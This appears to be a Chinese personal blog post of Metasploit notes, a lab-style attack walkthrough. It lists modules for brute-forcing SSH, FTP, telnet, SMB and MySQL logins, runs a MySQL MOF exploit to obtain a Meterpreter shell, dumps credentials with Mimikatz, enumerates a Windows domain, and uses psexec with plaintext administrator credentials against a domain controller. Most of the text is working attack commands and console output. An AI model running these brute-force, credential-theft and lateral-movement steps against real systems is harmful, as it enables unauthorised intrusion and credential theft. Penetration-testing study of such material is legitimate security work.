• msf各种弱口令爆破


    Msf:

     写的很乱 记录下msf各个爆破弱口令的模块

    run post/windows/gather/arp_scanner RHOSTS=10.10.10.0/24 使用arp_scanner模块 检测在线主机

    metasploit 增加路由

    route add 10.10.1.3 255.255.255.0 1

    使用扫描模块

    use scanner/portscan/tcp

    爆破ssh

    Msf>use auxiliary/scanner/ssh/ssh_login  

    爆破ftp

    Msf>use auxiliary/scanner/ftp/ftp_login

    爆破telnet

    Msf>use auxiliary/scanner/telnet/telnet_login  

    爆破smb

    auxiliary/scanner/smb/smb_login

    爆破Mysql

    use scanner/mysql/mysql_login

     

    msf auxiliary(scanner/mysql/mysql_login) > set USERNAME root

    USERNAME => root

    msf auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /root/passlist.txt

    PASS_FILE => /root/passlist.txt

    使用mof模块进行权限获取

    use windows/mysql/mysql_mof

    msf exploit(windows/mysql/mysql_mof) > set PASSWORD 123456

    PASSWORD => 123456

    msf exploit(windows/mysql/mysql_mof) > set rhost 10.10.1.3

    rhost => 10.10.1.3

    msf exploit(windows/mysql/mysql_mof) > set USERNAME root

    USERNAME => root

    msf exploit(windows/mysql/mysql_mof) > set payload windows/meterpreter/bind_tcp

    payload => windows/meterpreter/bind_tcp

    msf exploit(windows/mysql/mysql_mof) > exploit

    Mimikatz导出hash

    meterpreter > load mimikatz

    meterpreter > kerberos

    一些域内的命令

    查看域
    net view /domain

    查看当前域中的计算机
    net view

    查看CORP域中的计算机
    net view /domain:CORP

    Ping计算机名可以得到IP
    ping Wangsong-PC

    获取所有域的用户列表
    net user /domain

    获取域用户组信息
    net group /domain

    获取当前域管理员信息
    net group "domain admins" /domain

    查看域时间及域服务器的名字
    net time /domain

    net time /domain 就可以知道域的计算机名

    WIN-723O786H6KU.moonsec.com 10.10.1.2 这个就是域控

    net group "domain admins" /domain 

    反弹shell

    msf exploit(windows/smb/psexec) > set RHOST 10.10.1.2
    RHOST => 10.10.1.2
    msf exploit(windows/smb/psexec) > set SMBDomain moonsec
    SMBDomain => moonsec
    msf exploit(windows/smb/psexec) > set SMBUser administrator
    SMBUser => administrator
    msf exploit(windows/smb/psexec) > set SMBPass xxx123456..
    SMBPass => xxx123456..
    msf exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
    payload => windows/meterpreter/bind_tcp
    msf exploit(windows/smb/psexec) > exploit

  • 相关阅读:
    使用Microsoft URL Rewrite Module for IIS 7.0修改WEB.CONFIG即可实现*.HTML伪静态 无需修改应用程序映射
    我的第二个智能手机 HKC G801 严重质量问题 USB接口坏后解决办法
    JQuery的跨域方法 可跨新浪、腾讯等任意网站
    IIS7下使用MSDNURLRewriting.msi开源组件的设置
    面向对象编程,真离不开设计模式?
    jQuery 的filter(),not(),split()用法
    2008年总结
    程序中 同步和异步的经典解释 (一听就懂)
    2009年元旦前祝福 开心一下
    到底什么是SOA?
  • 原文地址:https://www.cnblogs.com/-qing-/p/10128915.html
Copyright © 2020-2023  润新知